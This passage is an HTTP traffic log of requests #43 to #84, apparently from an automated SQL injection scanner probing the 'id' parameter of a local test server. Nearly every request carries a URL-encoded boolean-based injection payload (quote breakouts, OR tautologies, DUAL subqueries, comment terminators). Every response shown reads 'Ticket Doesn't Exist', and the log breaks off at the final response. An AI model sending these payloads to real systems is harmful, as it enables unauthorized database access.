URI: http://localhost:8081/?id=78319%27%29%20WHERE%201090%3D1090%20AND%203402%3D1591--%20tACz

Ticket Doesn't Exist

############################################################################

HTTP request [#43]:
GET /?id=78319%22%29%20WHERE%209055%3D9055%20AND%201615%3D6653--%20QqeP HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#43] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%20WHERE%209055%3D9055%20AND%201615%3D6653--%20QqeP

Ticket Doesn't Exist

############################################################################

HTTP request [#44]:
GET /?id=78319%27%20WHERE%203227%3D3227%20AND%205386%3D6826--%20hkoL HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#44] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%20WHERE%203227%3D3227%20AND%205386%3D6826--%20hkoL

Ticket Doesn't Exist

############################################################################

HTTP request [#45]:
GET /?id=78319%22%20WHERE%201280%3D1280%20AND%203182%3D2732--%20CWro HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#45] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%20WHERE%201280%3D1280%20AND%203182%3D2732--%20CWro

Ticket Doesn't Exist

############################################################################

HTTP request [#46]:
GET /?id=78319%27%7C%7C%28SELECT%200x536c577a%20WHERE%207147%3D7147%20AND%203464%3D5438%29%7C%7C%27 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#46] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%7C%7C%28SELECT%200x536c577a%20WHERE%207147%3D7147%20AND%203464%3D5438%29%7C%7C%27

Ticket Doesn't Exist

############################################################################

HTTP request [#47]:
GET /?id=78319%27%7C%7C%28SELECT%200x59764857%20FROM%20DUAL%20WHERE%204604%3D4604%20AND%207037%3D7296%29%7C%7C%27 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#47] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%7C%7C%28SELECT%200x59764857%20FROM%20DUAL%20WHERE%204604%3D4604%20AND%207037%3D7296%29%7C%7C%27

Ticket Doesn't Exist

############################################################################

HTTP request [#48]:
GET /?id=78319%27%2B%28SELECT%200x4e6e5478%20WHERE%201708%3D1708%20AND%204835%3D5294%29%2B%27 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#48] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%2B%28SELECT%200x4e6e5478%20WHERE%201708%3D1708%20AND%204835%3D5294%29%2B%27

Ticket Doesn't Exist

############################################################################

HTTP request [#49]:
GET /?id=78319%7C%7C%28SELECT%200x686b5759%20FROM%20DUAL%20WHERE%207425%3D7425%20AND%203016%3D3447%29%7C%7C HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#49] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%7C%7C%28SELECT%200x686b5759%20FROM%20DUAL%20WHERE%207425%3D7425%20AND%203016%3D3447%29%7C%7C

Ticket Doesn't Exist

############################################################################

HTTP request [#50]:
GET /?id=78319%7C%7C%28SELECT%200x4b635367%20WHERE%209637%3D9637%20AND%202714%3D5884%29%7C%7C HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#50] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%7C%7C%28SELECT%200x4b635367%20WHERE%209637%3D9637%20AND%202714%3D5884%29%7C%7C

Ticket Doesn't Exist

############################################################################

HTTP request [#51]:
GET /?id=78319%2B%28SELECT%200x6d57746a%20WHERE%201619%3D1619%20AND%209809%3D3478%29%2B HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#51] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%2B%28SELECT%200x6d57746a%20WHERE%201619%3D1619%20AND%209809%3D3478%29%2B

Ticket Doesn't Exist

############################################################################

HTTP request [#52]:
GET /?id=78319%27%29%29%20AS%20vdVj%20WHERE%202837%3D2837%20AND%208777%3D4040--%20aHSf HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#52] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%29%20AS%20vdVj%20WHERE%202837%3D2837%20AND%208777%3D4040--%20aHSf

Ticket Doesn't Exist

############################################################################

HTTP request [#53]:
GET /?id=78319%22%29%29%20AS%20rcij%20WHERE%206752%3D6752%20AND%203027%3D4259--%20lkrD HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#53] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%29%20AS%20rcij%20WHERE%206752%3D6752%20AND%203027%3D4259--%20lkrD

Ticket Doesn't Exist

############################################################################

HTTP request [#54]:
GET /?id=78319%27%29%20AS%20eYXY%20WHERE%208830%3D8830%20AND%201546%3D9671--%20DWYF HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#54] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:48 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%29%20AS%20eYXY%20WHERE%208830%3D8830%20AND%201546%3D9671--%20DWYF

Ticket Doesn't Exist

############################################################################

HTTP request [#55]:
GET /?id=78319%22%29%20AS%20RTLp%20WHERE%202743%3D2743%20AND%207419%3D2704--%20iByN HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#55] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%29%20AS%20RTLp%20WHERE%202743%3D2743%20AND%207419%3D2704--%20iByN

Ticket Doesn't Exist

############################################################################

HTTP request [#56]:
GET /?id=78319%22%3D%2278319%22%20AND%209747%3D1278%20AND%20%2278319%22%3D%2278319 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#56] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%22%3D%2278319%22%20AND%209747%3D1278%20AND%20%2278319%22%3D%2278319

Ticket Doesn't Exist

############################################################################

HTTP request [#57]:
GET /?id=78319%27%20IN%20BOOLEAN%20MODE%29%20AND%207717%3D6993%23 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#57] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=78319%27%20IN%20BOOLEAN%20MODE%29%20AND%207717%3D6993%23

Ticket Doesn't Exist

############################################################################

HTTP request [#58]:
GET /?id=-6384 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#58] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6384

Ticket Doesn't Exist

############################################################################

HTTP request [#59]:
GET /?id=-3545%29%20OR%202537%3D4373--%20mljp HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#59] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3545%29%20OR%202537%3D4373--%20mljp

Ticket Doesn't Exist

############################################################################

HTTP request [#60]:
GET /?id=-8633%29%20OR%208771%3D8771--%20XkXD HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#60] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8633%29%20OR%208771%3D8771--%20XkXD

Ticket Doesn't Exist

############################################################################

HTTP request [#61]:
GET /?id=-2623%29%20OR%204409%3D6136%20AND%20%281246%3D1246 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#61] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2623%29%20OR%204409%3D6136%20AND%20%281246%3D1246

Ticket Doesn't Exist

############################################################################

HTTP request [#62]:
GET /?id=-9890%29%20OR%208771%3D8771%20AND%20%283631%3D3631 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#62] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9890%29%20OR%208771%3D8771%20AND%20%283631%3D3631

Ticket Doesn't Exist

############################################################################

HTTP request [#63]:
GET /?id=-3460%29%29%20OR%205168%3D9536%20AND%20%28%281670%3D1670 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#63] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3460%29%29%20OR%205168%3D9536%20AND%20%28%281670%3D1670

Ticket Doesn't Exist

############################################################################

HTTP request [#64]:
GET /?id=-2593%29%29%20OR%208771%3D8771%20AND%20%28%286113%3D6113 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#64] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2593%29%29%20OR%208771%3D8771%20AND%20%28%286113%3D6113

Ticket Doesn't Exist

############################################################################

HTTP request [#65]:
GET /?id=-6257%29%29%29%20OR%202156%3D7573%20AND%20%28%28%285144%3D5144 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#65] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6257%29%29%29%20OR%202156%3D7573%20AND%20%28%28%285144%3D5144

Ticket Doesn't Exist

############################################################################

HTTP request [#66]:
GET /?id=-2071%29%29%29%20OR%208771%3D8771%20AND%20%28%28%283089%3D3089 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#66] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2071%29%29%29%20OR%208771%3D8771%20AND%20%28%28%283089%3D3089

Ticket Doesn't Exist

############################################################################

HTTP request [#67]:
GET /?id=-2623%20OR%208666%3D3919 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#67] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2623%20OR%208666%3D3919

Ticket Doesn't Exist

############################################################################

HTTP request [#68]:
GET /?id=-9860%20OR%208771%3D8771 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#68] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:49 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9860%20OR%208771%3D8771

Ticket Doesn't Exist

############################################################################

HTTP request [#69]:
GET /?id=-4205%20OR%201864%3D4049--%20AZTc HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#69] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4205%20OR%201864%3D4049--%20AZTc

Ticket Doesn't Exist

############################################################################

HTTP request [#70]:
GET /?id=-4491%20OR%208771%3D8771--%20oTuk HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#70] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4491%20OR%208771%3D8771--%20oTuk

Ticket Doesn't Exist

############################################################################

HTTP request [#71]:
GET /?id=-3609%20OR%201503%3D6440%23%20LwEC HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#71] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3609%20OR%201503%3D6440%23%20LwEC

Ticket Doesn't Exist

############################################################################

HTTP request [#72]:
GET /?id=-9136%20OR%208771%3D8771%23%20rPts HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#72] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9136%20OR%208771%3D8771%23%20rPts

Ticket Doesn't Exist

############################################################################

HTTP request [#73]:
GET /?id=-4182%29%20WHERE%205838%3D5838%20OR%207073%3D6781--%20tjvT HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#73] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4182%29%20WHERE%205838%3D5838%20OR%207073%3D6781--%20tjvT

Ticket Doesn't Exist

############################################################################

HTTP request [#74]:
GET /?id=-6386%29%20WHERE%208894%3D8894%20OR%208771%3D8771--%20FKcG HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#74] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-6386%29%20WHERE%208894%3D8894%20OR%208771%3D8771--%20FKcG

Ticket Doesn't Exist

############################################################################

HTTP request [#75]:
GET /?id=-2476%20WHERE%206617%3D6617%20OR%203697%3D3442--%20RRgg HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#75] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-2476%20WHERE%206617%3D6617%20OR%203697%3D3442--%20RRgg

Ticket Doesn't Exist

############################################################################

HTTP request [#76]:
GET /?id=-7226%20WHERE%205004%3D5004%20OR%208771%3D8771--%20vLZX HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#76] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-7226%20WHERE%205004%3D5004%20OR%208771%3D8771--%20vLZX

Ticket Doesn't Exist

############################################################################

HTTP request [#77]:
GET /?id=-9416%29%29%20AS%20FjQl%20WHERE%203337%3D3337%20OR%209077%3D4062--%20EGMn HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#77] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-9416%29%29%20AS%20FjQl%20WHERE%203337%3D3337%20OR%209077%3D4062--%20EGMn

Ticket Doesn't Exist

############################################################################

HTTP request [#78]:
GET /?id=-1028%29%29%20AS%20uxwr%20WHERE%203863%3D3863%20OR%208771%3D8771--%20PDod HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#78] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1028%29%29%20AS%20uxwr%20WHERE%203863%3D3863%20OR%208771%3D8771--%20PDod

Ticket Doesn't Exist

############################################################################

HTTP request [#79]:
GET /?id=-8971%29%20AS%20QyxY%20WHERE%205402%3D5402%20OR%203290%3D3111--%20xlsE HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#79] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-8971%29%20AS%20QyxY%20WHERE%205402%3D5402%20OR%203290%3D3111--%20xlsE

Ticket Doesn't Exist

############################################################################

HTTP request [#80]:
GET /?id=-4349%29%20AS%20HRiT%20WHERE%204452%3D4452%20OR%208771%3D8771--%20MIPJ HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#80] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4349%29%20AS%20HRiT%20WHERE%204452%3D4452%20OR%208771%3D8771--%20MIPJ

Ticket Doesn't Exist

############################################################################

HTTP request [#81]:
GET /?id=-1715%27%29%20OR%207988%3D4259--%20orWt HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#81] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-1715%27%29%20OR%207988%3D4259--%20orWt

Ticket Doesn't Exist

############################################################################

HTTP request [#82]:
GET /?id=-3644%27%29%20OR%208771%3D8771--%20axsD HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#82] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:50 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-3644%27%29%20OR%208771%3D8771--%20axsD

Ticket Doesn't Exist

############################################################################

HTTP request [#83]:
GET /?id=-4557%27%20OR%207372%3D2559--%20Jthz HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#83] (200 OK):
Server: SimpleHTTP/0.6 Python/3.10.6
Date: Wed, 28 Dec 2022 15:14:51 GMT
Content-type: text/plain
URI: http://localhost:8081/?id=-4557%27%20OR%207372%3D2559--%20Jthz

Ticket Doesn't Exist

############################################################################

HTTP request [#84]:
GET /?id=-2139%27%20OR%208771%3D8771--%20vRdy HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; sv) AppleWebKit/522.12.1 (KHTML, like Gecko) Version/3.0.1 Safari/522.12.2
Referer: http://localhost:8081/
Host: localhost:8081
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#84] (200 OK):
